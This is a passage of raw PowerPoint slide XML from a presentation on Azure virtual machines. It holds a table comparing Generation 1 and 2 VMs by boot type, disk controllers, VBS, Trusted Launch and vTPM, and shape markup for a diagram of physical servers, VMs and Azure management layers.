                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4037888247"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>Boot type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>PCAT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>UEFI</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1064295319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>Disk Controllers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>IDE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>SCSI</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3500482074"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>VM Typer</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>Almost everyone</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>Almost everyone</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3260544187"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>OS Disk &gt; 2 TB</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3975876600"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>Price difference?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1947664814"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>Support VHDX?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2645099227"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>VBS </a:t>
                      </a:r>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400" dirty="0"/>
                        <a:t>NO</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3148923270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>Trusted Launch</a:t>
                      </a:r>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400" dirty="0"/>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1280535304"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
                        <a:t>vTPM</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400"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400" dirty="0"/>
                        <a:t>NO </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3278541697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC413AF-CB46-41C3-A839-24555265043F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634663" y="1072540"/>
            <a:ext cx="4102437" cy="4782160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Use Gen 2 wherever possible!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Cannot migrate from Gen 1 to Gen 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Solution? Create new VM with existing source disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>Not all VM types support Gen 2 yet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>Some GPU instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t>VBS = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0"/>
              <a:t>Support for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Credential Guard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Trusted Boot (does not work with Site Recovery or Shared/Ultra Disks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" strike="sngStrike" dirty="0"/>
              <a:t>Application Guard </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>VM Attestation service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3828584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C09C5FC-EA32-47A5-8FEE-7FA0FE51C930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669399" y="2802406"/>
            <a:ext cx="6267171" cy="3111592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75924FE1-0745-4C0E-840A-8078BE47A8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8089012" y="3276052"/>
            <a:ext cx="2673754" cy="2447246"/>
          </a:xfrm>
          <a:prstGeom prst="round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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8417340E-6A84-4681-AA13-C25F007C7113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8260189" y="2865601"/>
            <a:ext cx="38057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rPr>
              <a:t>Azure infrastruktur</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F4218A1D-B536-47E7-B475-ECF3D21AF3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="3585236"/>
            <a:ext cx="2359632" cy="874369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>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514E2569-7484-41FF-81E4-510AA34261FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="4553140"/>
            <a:ext cx="2359632" cy="871665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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4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Physical Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="14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44" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351C69F7-93D7-4C33-861C-7B024A8E1B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9082718" y="3835657"/>
            <a:ext cx="128166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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Storage Disk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0861FCD3-E4A2-444E-85CE-06AA625AE3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871422" y="3290305"/>
            <a:ext cx="2397730" cy="2447246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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2A3F5B80-30D1-41E7-8F0E-44E6A7AB0FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034638" y="3585237"/>
            <a:ext cx="2096366" cy="888622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B30A64B-0DC9-4B8C-A8C4-EBE3358EA403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257160" y="3668929"/>
            <a:ext cx="704850" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49E9565-3950-4636-BDEB-3498A045E31C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034638" y="4567393"/>
            <a:ext cx="2116036" cy="871665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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4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Physical Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="14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40" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F2C85F-46F5-4358-B51B-CBA1857D4B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6077476" y="3803864"/>
            <a:ext cx="107212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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VM01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A1B65D-0F12-4D71-80E1-5FADE9E50FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057594" y="2866696"/>
            <a:ext cx="38057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rPr>
              <a:t>Azure infrastruktur</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TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E158FCD-8673-44B5-A627-6255BC0A2663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6098081" y="5939913"/>
            <a:ext cx="38057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rPr>
              <a:t>Availability Zone #1 – Region X</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0" name="Picture 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5616A01-783C-4F90-8235-E5042A5339BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8320669" y="3768610"/>
            <a:ext cx="552450" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA21D34-C86F-4E96-B660-5FD474CE9CED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522861" y="1434092"/>
            <a:ext cx="2529618" cy="506539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Resource Manager (RDFE)</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730D6692-E034-44D9-A69F-614D8F348149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6609074" y="1435191"/>
            <a:ext cx="2529618" cy="506539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Fabric Controller (Service Fabric)</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DDA35627-4C78-4DB3-A90E-7E9A1B6CDDFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
